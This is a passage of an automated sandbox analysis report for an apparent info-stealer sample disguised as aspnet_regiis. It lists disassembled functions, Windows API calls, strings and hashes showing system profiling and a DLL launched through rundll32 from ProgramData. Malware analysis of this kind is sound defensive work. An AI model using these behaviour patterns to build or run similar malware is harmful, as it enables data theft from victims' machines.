                                                                                                                                                                    Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                    • ShellExecuteEx.SHELL32(?), ref: 00412B84
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                    • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                    • API String ID: 2215929589-2108736111
                                                                                                                                                                    • Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                                                                    • Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
                                                                                                                                                                    • Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                                                                    • Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98
                                                                                                                                                                    Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 004116CE
                                                                                                                                                                      • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                                                                      • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                    • String ID: Unknown
                                                                                                                                                                    • API String ID: 2781187439-1654365787
                                                                                                                                                                    • Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                                                                    • Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
                                                                                                                                                                    • Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                                                                    • Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58
                                                                                                                                                                    Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                                                                    • wsprintfA.USER32 ref: 0041117A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                    • String ID: %d MB
                                                                                                                                                                    • API String ID: 3644086013-2651807785
                                                                                                                                                                    • Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                                                                    • Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
                                                                                                                                                                    • Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                                                                    • Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759
                                                                                                                                                                    Function 0041BC21 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,75BF74F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,75BF74F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CreatePointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2024441833-0
                                                                                                                                                                    • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                                    • Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
                                                                                                                                                                    • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                                    • Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99
                                                                                                                                                                    Function 6C7AC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C7AC947
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C7AC969
                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C7AC9A9
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C7AC9C8
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C7AC9E2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4191843772-0
                                                                                                                                                                    • Opcode ID: 0b5944e6998cb78049a4fd920ef7695addcbb733f14c6d37862bc7d8862f9f96
                                                                                                                                                                    • Instruction ID: b656c0d4521f611c1bdc03f0f39fbbc08f4a4313ec0676d52ba1c41a7392c772
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b5944e6998cb78049a4fd920ef7695addcbb733f14c6d37862bc7d8862f9f96
                                                                                                                                                                    • Instruction Fuzzy Hash: E921F8717412056BDB24AAA8DD8ABBE76F9AF46309F500239F907A7F40DB215804CBD5
                                                                                                                                                                    Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                    • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CrackInternetlstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1274457161-0
                                                                                                                                                                    • Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                                                                    • Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
                                                                                                                                                                    • Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                                                                    • Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94
                                                                                                                                                                    Function 00410F51 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3466090806-0
                                                                                                                                                                    • Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                                                                                    • Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
                                                                                                                                                                    • Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                                                                                    • Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60
                                                                                                                                                                    Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                      • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B
                                                                                                                                                                    Strings
                                                                                                                                                                    • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                    • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                    • API String ID: 2929475105-1193256905
                                                                                                                                                                    • Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                                                                    • Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
                                                                                                                                                                    • Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                                                                    • Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89
                                                                                                                                                                    Function 00416DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 00416DCD
                                                                                                                                                                    • lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                    • String ID: ERROR
                                                                                                                                                                    • API String ID: 591506033-2861137601
